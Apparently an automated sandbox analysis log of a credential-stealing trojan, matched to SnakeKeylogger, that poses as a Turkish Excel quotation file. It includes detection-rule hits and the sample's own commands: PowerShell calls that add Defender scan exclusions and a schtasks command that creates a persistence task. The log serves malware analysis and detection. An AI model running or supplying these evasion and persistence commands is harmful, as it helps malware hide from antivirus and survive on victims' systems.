                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592E2EF14_2_0592E2EF
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592521814_2_05925218
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592323814_2_05923238
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592322714_2_05923227
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592522814_2_05925228
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeCode function: 14_2_0592126F14_2_0592126F
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000000.1331444675.000000000109A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevamE.exe8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1382075944.0000000007B80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowe vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1382075944.0000000007BE4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevamE.exe8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1382768826.0000000007CF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1379490138.00000000045CF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1376138734.000000000165E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000000.00000002.1377186980.0000000003341000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3797023101.0000000000444000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3797646309.0000000000BA7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeBinary or memory string: OriginalFilenamevamE.exe8 vs TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 14.2.YzkHZRBcm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000000.00000002.1379490138.0000000004349000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe PID: 7464, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: YzkHZRBcm.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4349970.2.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.438c990.3.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, QgUVtmLMw8PpFR9upN.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, FcY9ehqsfh4aVO4DAb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.4453ec0.4.raw.unpack, FcY9ehqsfh4aVO4DAb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, QgUVtmLMw8PpFR9upN.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.45fd470.1.raw.unpack, QgUVtmLMw8PpFR9upN.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe.7cf0000.6.raw.unpack, FcY9ehqsfh4aVO4DAb.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@3/3
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7760:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7688:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4300:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeMutant created: \Sessions\1\BaseNamedObjects\FDGYsLKdk
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA1D9.tmpJump to behavior
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.0000000003191000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.000000000315D000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.000000000319D000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.000000000316C000.00000004.00000800.00020000.00000000.sdmp, TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe, 00000009.00000002.3803235047.000000000314D000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.0000000003278000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000032B8000.00000004.00000800.00020000.00000000.sdmp, YzkHZRBcm.exe, 0000000E.00000002.3802870010.00000000032AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeReversingLabs: Detection: 52%
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeFile read: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeProcess created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exeProcess created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
